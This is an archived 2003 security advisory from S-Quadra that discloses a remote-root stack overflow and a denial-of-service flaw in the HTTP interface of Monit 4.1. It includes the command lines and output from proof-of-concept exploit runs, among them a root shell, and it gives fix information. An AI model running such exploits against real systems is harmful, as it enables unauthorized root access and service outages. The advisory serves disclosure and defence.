lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3FC20593.7090601@s-quadra.com>
From: e.legerov at s-quadra.com (S-Quadra Security Research)
Subject: Monit 4.1 HTTP interface multiple security vulnerabilities

         
            S-Quadra Advisory #2003-11-24

Topic: Monit 4.1 HTTP interface Multiple Security Vulnerabilities
Severity: High
Vendor URL: http://www.tildeslash.com/monit/
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031124.txt
Release date: 22 Nov 2003

1. DESCRIPTION

Monit (http://www.tildeslash.com/monit/) is a utility for managing and 
monitoring, processes, files, directories and devices on a Unix system.
It conducts automatic maintenance and repair and can execute meaningful 
causal actions in error situations.
Monit provides a HTTP(S) interface and you can use a browser to access 
the monit server.

There exists several security vulnerabilites in Monit HTTP interface, 
which could allow an attacker
in the worst case to gain root access to the system.

2. DETAILS

-- Vulnerability 1: Long http method stack overflow

By supplying an overly large http request method and attacker could 
trigger a stack overflow condition which may lead to a remote root 
compromise.
Below is a successfull run of 'xonya' Monit <= 4.1 remote root exploit 
(PoC):

$./xonya -t 3 -p 2812 192.168.3.12

Selected platform 3 ...
Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ...
Connected to 192.168.3.12:2812
Sending the request ...
Got a remote shell:

Linux 2.4.20 i686 unknown
uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
exit

-- Vulnerability 2: Denial of Service via negative Content-Length field

By supplying a negative value in Content-Length header an attacker could 
cause a xmalloc() failure and kill a Monit daemon.
Below is a successfull run of 'donit' Monit <= 4.1 remote Denial of 
Service exploit (PoC):

$./donit -p 2812 192.168.3.12

Connecting to 192.168.3.12:2812 ...
Sending the request ...
Done.

$ nc -v 192.168.3.12 2812
lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused

3. FIX INFORMATION

S-Quadra alerted Monit development team to this issue on 21th November 2003.
New version of Monit 4.1.1 is available at 
http://www.tildeslash.com/monit/dist/monit-4.1.1.tar.gz which fixes the 
reported security vulnerabilities.

4. CREDITS

Evgeny Legerov <e.legerov@...uadra.com> is responsible for discovering 
this issue.

5. ABOUT

S-Quadra offers services in computer security, penetration testing and 
network assesment,
web application security, source code review and third party product 
vulnerability assesment,
forensic support and reverse engineering.

Security is an art and our goal is to bring responsible and high quality 
security
service to the IT market, customized to meet the unique needs of each 
individual client.

S-Quadra, (pronounced es quadra), is not an acronym.
It's unique, creative and innovative - just like the security services 
we bring to our clients.

            S-Quadra Advisory #2003-11-24



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ